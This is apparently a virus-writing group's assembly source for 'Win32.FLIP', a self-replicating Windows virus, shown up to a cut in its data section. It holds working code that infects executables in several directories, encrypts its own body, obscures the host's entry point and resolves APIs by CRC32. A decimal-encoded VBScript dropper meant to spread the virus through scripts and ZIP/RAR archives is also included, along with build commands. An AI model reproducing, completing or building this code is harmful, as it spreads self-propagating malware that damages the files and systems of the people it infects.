;
; Win32.FLIP by dJANGGO/3F
; ************************
;
; Flip is direct action parasitic cross portable script infection win32 PE/EPO/ENC virus, the virus it self
; fully writen in assembler, but it doesnt have any decode procudere there I want to make something
; different in the cross infection cycle process between script and binary format, Flip ripped LANUM virus
; by psycologic,it doesnt use any base64 encoding at all, no debug command, because it will run very slow in 
; activeX object, de-convert proccess equal to lanum, I made the script as decompiler for the main virus 
; part and ADODB.Stream object as the engine.It so simple and it works :D
;
; I'm not realy good in description, so this Some cheat for AV product to understanding this thing :
;
; In PE/EXE Files :
;
; ~ Parasitic direct action PE appender
; ~ Infect files in current directory, windows and system directory
; ~ directory transfer both downward and upward
; ~ Append to the last section
; ~ It is Hardcoded in locating kernel, no much time to fix it
; ~ Simple Entry point Obscuring
; ~ Semi resident by hooking some API call (per process)
; ~ Use 5 layer opcode encryption
; ~ Trap posibble error
; ~ Use CRC32 to store API's
;
; In Script Files :
; 
; ~ The script it self has ability to De-compile virus binnary to hex value
; ~ Decompiling process uses charset="iso-8859-1" in ADODB.Stream object
; ~ Compile process as usual Hex-To-Bin way
; ~ Parasitic Script last appender
; ~ Inject virus files in every ZIP & RAR by its internal CLI
; ~ Total directory travelling to infect victim
; ~ Not encrypted
; ~ Undestructive payload every 17th
; ~ Trap posible error
;
;
; Maybe this life cycle scenario will clean it up :
;
;
; VIRUS BINARY ------> INFECT PE
;    |  ^       \-----> Drop script
;    |  |                    |
;    |  |-----decompile------|
;    |          
; infect another script with the virus body
;    |
;    |
;   \|/
;    |
;  sample
;  Before infection     After infection
;  _________             _________
; |         |           |Binnaries|
; |  html   |           |_________| 
; |  host   |  ---->    |         | -----> generate another VIRUS BINARY
; |         |           |   html  | 
; |_________|           |         |
;                       |_compile_| 
;
;
; Alert :
; This is life virus, I never send the source or binary to any AV Product,so they They may able to detect it
; or not, it means you take all responsible for what you did with the code, use it free, no guarante, no license,
; no copyright, no gnu/gpl, no blah blah blah.. I hate profitability
;
;
; Credit : Psychologic/3f, for the tutorial & your simple Lanum ;) 
;          I only wish you have much time to code more viruses for 3F :D
;
; To 
; Build this thing:
;
; tasm32 /z /ml /m1 flip,,;
; tlink32 -Tpe -c flip,flip,, import32.lib
; pewrsec flip.exe
;
;
;							~ dJANGGO/3F
;						Chain me, or you die
;


.586p
.model flat
jumps
.radix 16

 extrn ExitProcess:PROC

.data
 VirusSize equ (offset EndVirus - offset Virus )
 NumberOfApis equ 18d
 CryptSize = offset CryptEnd - offset CryptStart


VirusCode:
Virus:
 pushad

 pushfd
 call Delta                             

Delta:
 pop ebp
 sub ebp, ( offset Delta - 0)
                                        
                                        
 push ebp
 pop ebx
 sub ebx, 1
 inc ebx
 jz CryptStart
                                        
 push CryptSize
 pop ecx
 lea ebx, [ebp+CryptStart]
 adc dword ptr [ebp+Trash1], 618294     
 xchg ebx, edx

CryptLoop:
                                        
 mov al, byte ptr [edx]
 neg al
 add al, 2
 xor al, 20h
 org $-1
 CryptKey db 0h
 rol al, 3
 not al

                                        
 mov byte ptr [edx], al
                                        
 dec ecx
                                        
 add edx, 1
 test ecx, ecx
 jnz CryptLoop

CryptStart:

 jmp KernelSearchStart

 or eax, eax                            
                                        
FindFirstFileProc:
 call ClearOldData
 lea esi, [ebp+WIN32_FIND_DATA]
 and dword ptr [ebp+Trash1], edx        
 xchg eax, esi

 push eax
 push ebx
 call dword ptr [ebp+XFindFirstFileA]
 mov dword ptr [ebp+FindHandle], eax
ret


FindNextFileProc:                       
 call ClearOldData
 lea ebx, [ebp+WIN32_FIND_DATA]
 xchg ecx, ebx

 push ecx
                                        
 sub ebx, ebx
 xor ebx, dword ptr [ebp+FindHandle]
 push ebx
 adc edx, ecx                           
 call dword ptr [ebp+XFindNextFileA]
ret


ClearOldData:                           
 pushad
 lea eax, [ebp+WFD_szFileName]
 xchg eax, edi

                                        
 mov edx, ( 276d xor 32d )
 xor edx, 32d

ClearOldData2:
 mov byte ptr [edi], 0h
                                        
 sub edi, -1d
 dec edx
 jnz ClearOldData2
 popad
ret

Align:                                  
 pushad
 mov ecx, dword ptr [ebp+AlignReg2]
                                        
 sub edx, edx
 mov eax, dword ptr [ebp+AlignReg1]
 push eax
 div ecx
 sub ecx, edx
 pop eax
 add eax, ecx
 mov dword ptr [ebp+AlignReg1], 0h
 adc ebx, 59551560d                     
 add dword ptr [ebp+AlignReg1], eax
 popad
ret

GetOtherApis:
 push ecx 
 push edx 
 push esi
 call dword ptr [ebp+XLoadLibraryA]
 pop edx 
 pop ecx 
                                        
 mov esi, eax
GetOtherApiLoop:
 push ecx 
 push edx 
 push edi
 push esi
 call dword ptr [ebp+XGetProcAddress]
 pop edx 
 pop ecx 
 mov dword ptr [edx], eax
                                        
 add edx, 4d
 sub ecx, 1
 test ecx, ecx
 jz GetOtherApiEnd
GetOtherApiLoop2:
                                        
 sub edi, -1d
 cmp byte ptr [edi], 0
 jne GetOtherApiLoop2
                                        
 sub edi, -1d
 jmp GetOtherApiLoop
GetOtherApiEnd:
ret
KernelSearchStart:
                                        
 mov eax, ebp
 add eax, offset Virus

 sub eax, dword ptr [ebp+OldEIP]
 not edx                                
ImageBaseLoop2:
 add eax, -1
 cmp dword ptr [eax], 'EP'
 jne ImageBaseLoop2
ImageBaseLoop:
 add eax, -1
 cmp word ptr [eax], 'ZM'
 jne ImageBaseLoop
                                        
                                        
 xor ebx, ebx
 add ebx, eax
 cmp bx, 0
 jne ImageBaseLoop
 mov dword ptr [ebp+OldBase], 0
 xor dword ptr [ebp+OldBase], eax
 add dword ptr [ebp+Trash1], 1344551    
                                        
 mov ecx, 077f00000h
 call GetKernel32
 jnc GetApis
 mov ecx, 077e00000h
 neg edx                                
 call GetKernel32
 jnc GetApis
 mov ecx, 0bff70000h
 call GetKernel32
 jnc GetApis

 jmp NoKernel
GetKernel32:
 pushad
                                        
 sub ebx, ebx

 lea eax, dword ptr [esp-8h]
 xchg eax, dword ptr fs:[ebx]
 lea ebx, [ebp+GetKernel32Exception]
 xchg edi, ebx

 push edi
 push eax

                                        
 add ecx, 1d
GetKernelLoop:
                                        
 mov eax, -37751d
 add eax, 37751d
 sub ecx, 1
 mov ax, word ptr [ecx+03ch]
 cmp ax,0f800h
 je GetKernelLoop
 cmp ecx, dword ptr [ecx+eax+34h]
 jnz GetKernelLoop
 mov dword ptr [ebp+KernelMZ], -1
 and dword ptr [ebp+KernelMZ], ecx
 mov ebx, [ecx+3Ch]
 add ebx, ecx
 mov [KernelPE+ebp], ebx

                                        
 mov esi, -59433d
 add esi, 59433d

 pop dword ptr fs:[esi]
 pop ebx
 popad
 clc
ret

GetKernel32Exception:
                                        
 and eax, 0

 mov ecx, dword ptr fs:[eax]
 mov esp, dword ptr [ecx]
GetKernel32NotFound:
                                        
 sub esi, esi

 pop dword ptr fs:[esi]
 pop eax
 popad
 stc
ret

GetEPO:
 pushad
 mov ecx, dword ptr [ebp+MapAddress]
 neg eax                                
 add ecx, dword ptr [ecx+3ch]
 mov eax, dword ptr [ecx+28h]
                                        
 mov dword ptr [ebp+RAW], -1
 and dword ptr [ebp+RAW], eax
                                        
 mov ecx, 0
 add ecx, 1d
 mov dword ptr [ebp+RAWw], 0
 xor dword ptr [ebp+RAWw], ecx
 call RVA2RAW
                                        
 mov edx, 0
 add edx, dword ptr [ebp+RAW]
 mov dword ptr [ebp+EPOmem], edx
 popad
ret
                                      
SearchAPI1:                             
 pushad

 mov ebx, dword ptr [ebp+KernelPE]
                                        
 mov eax, [ebx+78h]
 add eax, [ebp+KernelMZ]
                                        
 inc eax
 add eax, 27d
                                        
 mov ebx, dword ptr [eax]
 add ebx, [ebp+KernelMZ]
 mov dword ptr [ebp+ATableVA], ebx
                                        
 add eax, 4d
 sbb ecx, 10d                           
                                        
 mov ebx, dword ptr [eax]
 add ebx, [ebp+KernelMZ]
 mov dword ptr [ebp+NTableVA], ebx
 xor ecx, 27278952d                     
                                        
 add eax, 4d
                                        
 mov ebx, dword ptr [eax]
 add ebx, [ebp+KernelMZ]
 mov dword ptr [ebp+OTableVA], ebx
                                        
 xor eax, eax
 xor eax, dword ptr [ebp+NTableVA]


SearchNextApi1:                         
 push eax
 mov ecx, dword ptr [eax]
 add ecx, [ebp+KernelMZ]
                                        
 push ecx
 pop eax
                                        
 push eax
 pop esi
 mov dword ptr [ebp+TempApisearch2], esi
 mov dword ptr [ebp+TempApisearch3], edx
 cld
                                         
 call CRC32
 push dword ptr [ebp+APICRC32]
 adc dword ptr [ebp+Trash1], ebx        
 pop ecx
 sub ecx, dword ptr [edx]
 add ecx, -1
 add ecx, 1
 jz FoundApi1

ApiNotFound:                            
 pop eax
 push dword ptr [ebp+TempApisearch2]
 and ebx, edx                           
 pop esi
                                        
 and edx, 0
 add edx, dword ptr [ebp+TempApisearch3]
                                        
 dec eax
 add eax, 5d
 inc word ptr [ebp+counter]
 cmp word ptr [ebp+counter], 2001h
 je NotFoundApi1
 jmp SearchNextApi1

FoundApi1:                              
                                        
 add esp, 4d
                                        
 movzx eax, word ptr [ebp+counter]
                                        
 shl eax, 1                             
 adc ebx, 37649110d                     
 add eax, dword ptr [ebp+OTableVA]
 mov ebx, eax
 movzx eax, word ptr [ebx]
 shl eax, 2h
 add eax, dword ptr [ebp+ATableVA]
 and dword ptr [ebp+Trash1], 334443     
                                        
                                        
 mov ebx, 24342d
 sub ebx, 24342d
 add ebx, dword ptr [ebp+KernelMZ]
 add ebx, dword ptr [eax]
 mov dword ptr [ebp+TempAPI], ebx
 popad
ret

NotFoundApi1:
                                        
                                        
 pop edi
 popad
 jmp ExecuteHost





CreateDroppedFile:
                                        
 lea edx, [ebp+OldDirectory]
 xchg ecx, edx

 push ecx
 push 255d
 call dword ptr [ebp+XGetCurrentDirectoryA]
                                        
 push 255d
 pop ebx
 push ebx
 lea edx, [ebp+DirectoryBuffer]
 xchg edx, ecx

 push ecx
 call dword ptr [ebp+XGetWindowsDirectoryA]
 lea eax, [ebp+DirectoryBuffer]
 xchg eax, esi

 push esi
 call dword ptr [ebp+XSetCurrentDirectoryA]
                                        
 mov ebx, offset DroppedFile
 add ebx, ebp

 call FindFirstFileProc
 inc eax
 jz NoDroppedFile
 call InfectFile
                                        
 push 1 
 mov ebx, offset DroppedFile2
 add ebx, ebp

 push ebx
 mov edx, offset DroppedFile
 add edx, ebp

 push edx
 call dword ptr [ebp+XCopyFileA]
NoDroppedFile:                                 
 lea ecx, [ebp+OldDirectory]
 xchg ecx, esi

 push esi
 call dword ptr [ebp+XSetCurrentDirectoryA]
ret

InfectFile:                             
                                        
                                        
 push 0
 pop ebx
 add ebx, dword ptr [ebp+WFD_nFileSizeHigh]
 cmp ebx, 0
 jne NoInfection
                                        
 cmp dword ptr [ebp+WFD_nFileSizeLow], 20000d
 jbe NoInfection
                                        
 mov ebx, ebp
 add ebx, offset WFD_szFileName

 push ebx
 call dword ptr [ebp+XGetFileAttributesA]
 mov dword ptr [ebp+Attributes], eax
 push 80h
 lea ecx, [ebp+WFD_szFileName]


 push ecx
 call dword ptr [ebp+XSetFileAttributesA]
 cmp eax, 0
 je NoInfection
 call OpenFile                          
 jc NoInfection
                                        
 push dword ptr [ebp+MapAddress]
 pop esi
                                        
 cmp word ptr [esi], 'ZM'
 je Goodfile
                                        
 mov eax, 15663d
 cmp eax, 0
 jne Notagoodfile
Goodfile:
 cmp word ptr [esi+3Ch], 0h
 jne _Notagoodfile
 jmp Notagoodfile
_Notagoodfile:
 push dword ptr [esi+3Ch]
 pop eax
 xor ecx, 13712248d                     
                                        
 cmp dword ptr [ebp+WFD_nFileSizeLow],eax
 jb Notagoodfile
 add eax, esi
 shr edx, 1d                            
                                        
                                        
 cmp word ptr [eax], 'EP'
 je Goodfile2
 jmp Notagoodfile

Goodfile2:
                                        
 cmp dword ptr [eax+4Ch], 'FLIP'
 jz Notagoodfile
 dec dword ptr [ebp+Trash1]             

                                        
 mov cx, word ptr [eax+16h]
 and cx, 00002h
 cmp cx, 00002h
 jne Notagoodfile
 call InfectEXE                         
 jc NoInfection2
 and ebx, eax                           

Notagoodfile:
 call UnMapFile

NoInfection2:
 and dword ptr [ebp+Trash1], 1489786    

 xor dword ptr [ebp+Trash1], ebx        
                                        
 mov ebx, dword ptr [ebp+Attributes]
 push ebx
 mov edx, offset WFD_szFileName
 add edx, ebp

 push edx
 call dword ptr [ebp+XSetFileAttributesA]

NoInfection:
ret

TravelUpwards:
 lea ebx, [ebp+RootDir]
 xchg ecx, ebx

 push ecx
                                        
 call dword ptr [ebp+XSetCurrentDirectoryA]
StartTravelDirsUp:
 mov ebx, ebp
 add ebx, offset Folders

 call FindFirstFileProc
 cmp dword ptr [ebp+FindHandle], -1
 je EndTravelUp
GetOtherDir:
                                        
 mov ebx, dword ptr [ebp+WFD_dwFileAttributes]
 and ebx, 10h
 jz GetNextDirUp
                                        
 lea esi, [ebp+WFD_szFileName]


 cmp byte ptr [esi], '.'
 je GetNextDirUp
 call GetRand
                                        
 mov ebx, ( 4d + 30d )
 sub ebx, 30d
                                        
 xor edx, edx
 mov eax, dword ptr [ebp+RandVal]
 div ebx
 cmp edx, 0 
 jne GetNextDirUp
                                        
 mov ecx, -1d
 and ecx, dword ptr [ebp+FindHandle]

 push ecx
 call dword ptr [ebp+XFindClose]
 mov eax, offset WFD_szFileName
 add eax, ebp

 push eax
 call dword ptr [ebp+XSetCurrentDirectoryA]
 sbb ebx, 9d                            
 call InfectCurDir
 jmp StartTravelDirsUp
GetNextDirUp:
 call FindNextFileProc
 test eax, eax
 jnz GetOtherDir
EndTravelUp:
                                        
                                        
 and ebx, 0
 add ebx, dword ptr [ebp+FindHandle]
 push ebx
 call dword ptr [ebp+XFindClose]
ret

                                        
OpenFile:                               
 push 0
 push 0
 sbb ecx, 13d                           
 push 3
 push 0
 push 1
 mov edx, 80000000h or 40000000h
 push edx
 lea eax, [ebp+WFD_szFileName]

 push eax
 call dword ptr [ebp+XCreateFileA]

 add eax, 1
 jz Closed
 dec eax

 mov dword ptr [ebp+FileHandle], eax

CreateMap:                              
                                        
 mov edx, ( -1d xor 13d )
 xor edx, 13d
 and edx, dword ptr [ebp+WFD_nFileSizeLow]
 push edx

                                        
 push 0
 pop ecx
 push ecx
 push edx
 push ecx
 push 00000004h
 push ecx
 push dword ptr [ebp+FileHandle]
 or ebx, 20952004d                      
 call dword ptr [ebp+XCreateFileMappingA]
 mov dword ptr [ebp+MapHandle], eax
 pop edx
 or eax, eax
 jz CloseFile
                                        
 mov ecx, 0
 push edx
 push ecx
 push ecx
                                        
 mov ebx, 0
 add ebx, 2d
 push ebx
 push dword ptr [ebp+MapHandle]
 call dword ptr [ebp+XMapViewOfFile]
 dec eax
 inc eax
 jz UnMapFile
 mov dword ptr [ebp+MapAddress], eax
 clc
ret
 and dword ptr [ebp+Trash1], eax        

UnMapFile:                              
 Call UnMapFile2

CloseFile:                              
 push dword ptr [ebp+FileHandle]
 Call [ebp+XCloseHandle]

Closed:
 stc
ret

UnMapFile2:
 push dword ptr [ebp+MapAddress]
 call dword ptr [ebp+XUnmapViewOfFile]
 push dword ptr [ebp+MapHandle]
 call dword ptr [ebp+XCloseHandle]
ret

InfectEXE:                              
 push dword ptr [ebp+MapAddress]
 pop edi
                                        
 mov esi, edi
 add esi, [edi+3Ch]
                                        
                                        
 add esi, 60d
 mov eax, [esi]
 inc esi
 sub esi, 61d
 push eax
 pop dword ptr [ebp+filealign]
 mov esi, dword ptr [ebp+MapAddress]
 shl ebx, 27d                           
                                        
 mov eax, esi
 add eax, dword ptr [esi+3Ch]
                                        
                                        
 mov dword ptr [ebp+PEheader], -1
 and dword ptr [ebp+PEheader], eax
                                        
 mov ecx, dword ptr [eax+34h]
 mov dword ptr [ebp+OldBase], ecx
 mov edx, dword ptr [eax+28h]
 mov dword ptr [ebp+OldEIP], 0
 add dword ptr [ebp+OldEIP], edx
 mov edx, [eax+38h]
 mov dword ptr [ebp+sectionalign], 0
 xor dword ptr [ebp+sectionalign], edx
                                        
 mov edx, [eax+74h]
 shl edx, 3
                                        
 push 0
 pop ebx
 mov bx, word ptr [eax+6h]
 mov ecx, 28h
 pushad
 mov eax, ebx
 mul ecx
 mov dword ptr [ebp+Misc1], -1
 and dword ptr [ebp+Misc1], eax
 popad
 mov ebx, dword ptr [ebp+Misc1]
 add eax, 78h
 add eax, edx
 add eax, ebx
 lea edx, [ebp+newsection]
 xchg edx, ecx


 xchg ecx, eax
 push ecx
                                        
 mov ebx, [ecx-5*8+8d]
 add ebx, [ecx-5*8+12d]
 mov eax, dword ptr [ebp + offset sectionalign]
 push ebx
 pop dword ptr [ebp+AlignReg1]
 mov dword ptr [ebp+AlignReg2], eax
 mov dword ptr [ebp+nsphysicalsize], -1
 and dword ptr [ebp+nsphysicalsize], ebx
 Call Align
 push dword ptr [ebp+AlignReg1]
 pop eax
 mov dword ptr [ebp + offset nsRVA], eax
                                        
 mov eax, dword ptr [ebp + offset sectionalign]
 mov dword ptr [ebp+AlignReg1], 0
 add dword ptr [ebp+AlignReg1], VirusSize
 mov dword ptr [ebp+AlignReg2], eax
 Call Align
 push dword ptr [ebp+AlignReg1]
 pop edx
 mov dword ptr [ebp+nsvirtualsize], edx
                                        
 mov ebx,[ecx-5*8+20d]
 add ebx,[ecx-5*8+16d]
 mov ecx,dword ptr [ebp + offset filealign]
 mov dword ptr [ebp+AlignReg1], 0
 inc edx                                
 xor dword ptr [ebp+AlignReg1], ebx
 mov dword ptr [ebp+AlignReg2], ecx
 Call Align
 mov eax, dword ptr [ebp+AlignReg1]
 mov dword ptr [ebp+nsphysicaloffset], 0
 mov dword ptr [ebp+Trash1], ebx        
 xor dword ptr [ebp+nsphysicaloffset], eax
                                        
 mov edx, dword ptr [ebp+filealign]
 mov ebx, eax
 mov dword ptr [ebp+AlignReg2], edx
 add ebx, VirusSize
 push ebx
 pop dword ptr [ebp+AlignReg1]
 call Align
 push dword ptr [ebp+AlignReg1]
 pop ebx
                                        
 mov dword ptr [ebp+NewSize], ebx
 pushad
 Call UnMapFile2
 popad
 mov dword ptr [ebp+WFD_nFileSizeLow], 0
 xor dword ptr [ebp+WFD_nFileSizeLow], ebx
 call CreateMap
 jc NoEXE
 lea edx, [ebp+newsection]
 xchg ecx, edx

                                        
 mov eax, 0
 add eax, 64d
 pop ebx
WriteNewSectionLoop:
 mov dl, byte ptr [ecx]
 mov byte ptr [ebx], dl
                                        
 add ebx, 1d
                                        
 inc ecx
 dec eax
 or eax, eax
 jnz WriteNewSectionLoop
                                        
                                        
 mov edx, 61160d
 sub edx, 61160d
 add edx, dword ptr [ebp+PEheader]
                                        
 call GetEPO
 add word ptr [edx+06h], 1
 push dword ptr [ebp+nsRVA]
 pop ecx
 mov dword ptr [ebp+NewEIP], 0
 add dword ptr [ebp+NewEIP], ecx
                                        
 mov dword ptr [edx+4Ch], -1d
 and dword ptr [edx+4Ch], 'FLIP'
                                        
 mov ebx, 0
 xor ebx, dword ptr [ebp+nsphysicaloffset]
 push ebx
 mov ecx, dword ptr [ebp+EPOmem]

                                        
 mov eax, ( -1d xor 30d )
 xor eax, 30d
 dec ecx
EPOByteSearch:
                                        
 inc eax
                                        
 cmp eax, 440d
 jae EPOByteSearchFailed
                                        
 sub ecx, -1d
                                        
                                        
                                        
                                        
                                        
                                        
                                        
 cmp byte ptr [ecx+4], 0C3h
 jne EPOByteSearch
 cmp dword ptr [ecx], 0C95B5E5Fh
 jne EPOByteSearch
 mov dword ptr [ebp+EPOCount], 0
 xor dword ptr [ebp+EPOCount], eax
 mov byte ptr [ecx], 0E8h               
                                        
                                        
 mov ebx, 0
 add ebx, -1d
 and ebx, dword ptr [ebp+NewEIP]
 sub ebx, dword ptr [ebp+OldEIP]
 inc ebx
 sub ebx, 6d
 sub ebx, dword ptr [ebp+EPOCount]
 mov dword ptr [ecx+1], ebx
 jmp EndEPOStuff
EPOByteSearchFailed:                    
                                        
 push dword ptr [ebp+MapAddress]
 pop ebx
 mov ecx, ebx                           
 add ebx, dword ptr [ebx+3Ch]
                                        
 push dword ptr [ebp+NewEIP]
 pop edx
 mov dword ptr [ebx+28h], edx
                                        
 mov eax, -1d
 mov dword ptr [ebp+EPOCount], 0
 add dword ptr [ebp+EPOCount], eax
EndEPOStuff:
                                        
 pop edi

                                        
 call GetRand
 mov edx, dword ptr [ebp+RandVal]
 mov byte ptr [ebp+CryptKey], dl

 mov edx, ( offset CryptStart - offset Virus )
 lea ebx, [ebp+Virus]
 xchg ebx, esi

 add edi, dword ptr [ebp+MapAddress]

AppendLoop:
 movsb
 dec edx
 jnz AppendLoop
 xor edx, edx
 add edx, CryptSize

CryptAppendLoop:
 lodsb
 not al
 ror al, 3
 xor al, byte ptr [ebp+CryptKey]
 sub al, 2
 neg al

 stosb
 sub edx, 1
 jnz CryptAppendLoop
 xor eax, 79568019d                     
 cmp dword ptr [ebp+XCheckSumMappedFile], -1d
 je NoCheckSum
 lea ecx, [ebp+CheckSum]
 xchg ebx, ecx

 push ebx
 mov ecx, ebp
 add ecx, offset HeaderSum

 push ecx
                                        
 sub eax, eax
 add eax, dword ptr [ebp+NewSize]
 push eax
 mov eax, dword ptr [ebp+MapAddress]
 push eax
 call dword ptr [ebp+XCheckSumMappedFile]
 mov ecx, dword ptr [ebp+MapAddress]
 mov ecx, [ecx+3Ch]
 add ecx, dword ptr [ebp+MapAddress]
 mov eax, dword ptr [ebp+CheckSum]
 xor ebx, ebx                           
 mov dword ptr [ecx+58h], eax
NoCheckSum:
                                        
                                        
 xor ebx, ebx
 add ebx, dword ptr [ebp+InfCounter]
 dec ebx
 mov dword ptr [ebp+InfCounter], ebx
 clc
ret

NoEXE:
 pop ecx
 stc
ret


GetDeltaOffset:
 call Delta2
Delta2:
 pop ebp
 sub ebp, offset Delta2
ret


GetApis:                                

                                       
 push NumberOfApis
 pop eax
                                        
 mov esi, offset APIOffsets
 add esi, ebp

 lea ecx, [ebp+APINames]
 xchg ecx, edx


GetApisLoop: 
                                        
 mov word ptr [ebp+counter], 0h                               
                                        
                                        

 call SearchAPI1
                                        
 inc edx
 add edx, 3d
 adc ecx, 46483185d                     
 mov ebx, dword ptr [ebp+TempAPI]
 mov dword ptr [esi], -1
 and dword ptr [esi], ebx
 cmp byte ptr [ebx], 0cch               
 je ExecuteHost
                                        
 dec esi
 add esi, 5d
 dec eax
 jnz GetApisLoop
                                        
 mov ecx, 0
 add ecx, 4d
 lea edi, [ebp+AdvapiNames]

 lea eax, [ebp+AdvapiOffsets]
 xchg eax, edx

 mov esi, ebp
 add esi, offset Advapi32

 call GetOtherApis
 add eax, edx                           
 mov esi, ebp
 add esi, offset Shell32

 mov edx, offset XShellExecuteA
 add edx, ebp

                                        
 push 1d
 pop ecx
 mov edi, offset ShellExApi
 add edi, ebp

 call GetOtherApis
 lea edx, [ebp+XCheckSumMappedFile]

                                        
 mov ecx, ( 1d - 4d )
 add ecx, 4d
 lea eax, [ebp+Imagehlp]
 xchg esi, eax

 mov edi, offset CheckSumMFA
 add edi, ebp

 call GetOtherApis
 lea ebx, [ebp+Outbreak]
 xchg ecx, ebx

 push ecx
ret

RVA2RAW:
 pushad
                                        
 mov ecx, dword ptr [ebp+MapAddress]

 xor ebx, 79377927d                     
 add ecx, dword ptr [ecx+3ch]
 inc dword ptr [ebp+Trash1]             
                                        
 mov eax, ecx

                                        
 mov ebx, 0
 add ebx, 24d
 add bx, word ptr [ecx+14h]
 add ecx, ebx
                                        
 push ecx
 pop dword ptr [ebp+fstSec]
 mov edx, dword ptr [ebp+MapAddress]
 add edx, dword ptr [edx+3ch]
 shl eax, 7d                            
 mov ebx, dword ptr [edx+28h]
                                        
                                        
 sub eax, eax
 mov ax, word ptr [edx+06h]
 mov edx, dword ptr [ebp+fstSec]

sectionLoop:
                                        
 mov ecx, dword ptr [edx+0ch]
 add ecx, dword ptr [edx+08h]
 cmp ecx, ebx
 jae sectionFound
                                        
 add edx, 40d

 sub eax, 1

 cmp eax, 0
 jne sectionLoop
 jmp RVA2RAWFailed
sectionFound:
 test dword ptr [edx+24h], 10000000h
 jnz RVA2RAWFailed
 sub ebx, dword ptr [edx+0ch]
 mov eax, dword ptr [edx+10h]
 add ebx, dword ptr [edx+14h]
                                        
 cmp dword ptr [ebp+RAWw], 1d 
 jne RVA2RAW1
 or dword ptr [edx+24h], 0A0000020h
 adc ecx, 48370759d                     
RVA2RAW1:
 sub eax, ebx
 add ebx, dword ptr [ebp+MapAddress]
 mov dword ptr [ebp+RAW], ebx

 popad
ret
 sub ecx, ecx                           

RVA2RAWFailed:
 mov dword ptr [ebp+RAW], 0
 popad
ret





Data:
 counter     dw 0h
 NTableVA    dd 0h
 NameBufLen2 dd 255
 Attributes  dd 0h

 APINames:
 dd 0C200BE21h           
 dd 03C19E536h           
 dd 0797B49ECh           
 dd 0FE248274h           
 dd 04134D1ADh           
 dd 0EBC6C18Bh           
 dd 0B2DBD7DCh           
 dd 068624A9Dh           
 dd 0AE17EBEFh           
 dd 0AA700106h           
 dd 094524B42h           
 dd 05BD05DB1h           
 dd 0FFC97C1Fh           
 dd 0C633D3DEh           
 dd 0593AE7CEh           
 dd 021777793h           
 dd 096B2D96Ch           
 dd 08C892DDFh           

 EPOCount    dd 0h
 OldEIP      dd 0h
 MapAddress  dd 0h
 OTableVA    dd 0h
 TempGetApi1 dd 0h
 FindHandle  dd 0h
 TempApisearch3 dd 0h
 RegType     dd 0h
 CheckSum dd 0h
 HeaderSum dd 0h
 RootDir db 'C:\',0
 sectionalign   dd 0h

AdvapiNames: 
 db 'RegOpenKeyExA',0
 db 'RegQueryValueExA',0
 db 'RegCloseKey',0
 db 'RegEnumKeyA',0

 FileHandle  dd 0h
 TempApisearch2 dd 0h
 TempGetApi3 dd 0h
 DroppedFile    db 'notepad.exe',0
 DirectoryBuffer db 255d dup (0h)
 Advapi32   db 'advapi32.dll',0
 db 'Win32.FLIP - dJANGGO',0
 OldDirectory db 255d dup (0h)

newsection:                           
 nsname           db '.Djanggo'
 nsvirtualsize    dd 0                
 nsRVA            dd 0                
 nsphysicalsize   dd 0                
 nsphysicaloffset dd 0                
 nsreserved       dd 0,0,0            
 nsflags          db 40h,0,0,0c0h     

 Shell32     db 'Shell32.dll',0
 NameBuffer db 255d dup (?)
 K32_DLL     db 'KERNEL32.dll',0 
 AlignReg2   dd 0h
 Trash1      dd 0h
 RAWw        dd 0h
 ATableVA    dd 0h
 OldEPOCount dd 0h
 NameBufLen dd 255
 XCheckSumMappedFile    dd 0h
 RAW         dd 0h
 FILETIME                STRUC
 FT_dwLowDateTime        dd       ?
 FT_dwHighDateTime       dd       ?
 FILETIME ENDS

 WIN32_FIND_DATA         label    byte
 WFD_dwFileAttributes    dd       ?
 WFD_ftCreationTime      FILETIME ?
 WFD_ftLastAccessTime    FILETIME ?
 WFD_ftLastWriteTime     FILETIME ?
 WFD_nFileSizeHigh       dd       ?
 WFD_nFileSizeLow        dd       ?
 WFD_dwReserved0         dd       ?
 WFD_dwReserved1         dd       ?
 WFD_szFileName          db       260d dup (?)
 WFD_szAlternateFileName db       13   dup (?)
 WFD_szAlternateEnding   db       03   dup (?)

 RegData2    dd 0h
 KernelMZ    dd 0h
 TempAPI     dd 0h
 AlignReg1   dd 0h
 NameBuffer2 db 255d dup (?)
 ShellExApi  db 'ShellExecuteA',0
 filemask    db '*.eXe',0

ScriptDropper:
db 82d,69d,77d,32d,70d,76d,73d,80d,13d,10d,111d,110d,32d
db 101d,114d,114d,111d,114d,32d,114d,101d,115d,117d,109d,101d,32d
db 110d,101d,120d,116d,13d,10d,99d,111d,110d,115d,116d,32d,97d
db 100d,84d,121d,112d,101d,66d,105d,110d,97d,114d,121d,61d,49d
db 13d,10d,67d,111d,110d,115d,116d,32d,97d,100d,84d,121d,112d
db 101d,84d,101d,120d,116d,61d,50d,13d,10d,115d,101d,116d,32d
db 98d,115d,61d,99d,114d,101d,97d,116d,101d,111d,98d,106d,101d
db 99d,116d,40d,34d,65d,68d,79d,68d,66d,46d,83d,116d,114d
db 101d,97d,109d,34d,41d,13d,10d,98d,115d,46d,84d,121d,112d
db 101d,61d,49d,58d,98d,115d,46d,111d,112d,101d,110d,58d,98d
db 115d,46d,108d,111d,97d,100d,102d,114d,111d,109d,102d,105d,108d
db 101d,32d,34d,67d,58d,92d,102d,108d,105d,112d,46d,101d,120d
db 101d,34d,58d,98d,115d,46d,102d,108d,117d,115d,104d,58d,98d
db 115d,46d,112d,111d,115d,105d,116d,105d,111d,110d,32d,61d,32d
db 48d,13d,10d,98d,115d,46d,116d,121d,112d,101d,61d,50d,58d
db 98d,115d,46d,99d,104d,97d,114d,115d,101d,116d,61d,34d,105d
db 115d,111d,45d,56d,56d,53d,57d,45d,49d,34d,58d,109d,61d
db 98d,115d,46d,114d,101d,97d,100d,116d,101d,120d,116d,58d,104d
db 61d,48d,58d,70d,111d,114d,32d,107d,32d,61d,32d,49d,32d
db 84d,111d,32d,76d,101d,110d,40d,109d,41d,58d,104d,61d,104d
db 43d,49d,13d,10d,115d,116d,114d,67d,104d,97d,114d,32d,61d
db 32d,77d,105d,100d,40d,109d,44d,32d,107d,44d,32d,49d,41d
db 13d,10d,115d,116d,114d,72d,101d,120d,32d,61d,32d,82d,105d
db 103d,104d,116d,40d,34d,48d,48d,34d,32d,38d,32d,72d,101d
db 120d,40d,65d,115d,99d,40d,115d,116d,114d,67d,104d,97d,114d
db 41d,41d,44d,32d,50d,41d,13d,10d,105d,102d,32d,104d,61d
db 49d,48d,48d,32d,116d,104d,101d,110d,13d,10d,115d,116d,114d
db 104d,101d,120d,118d,97d,108d,117d,101d,32d,61d,32d,115d,116d
db 114d,72d,101d,120d,86d,97d,108d,117d,101d,32d,38d,32d,115d
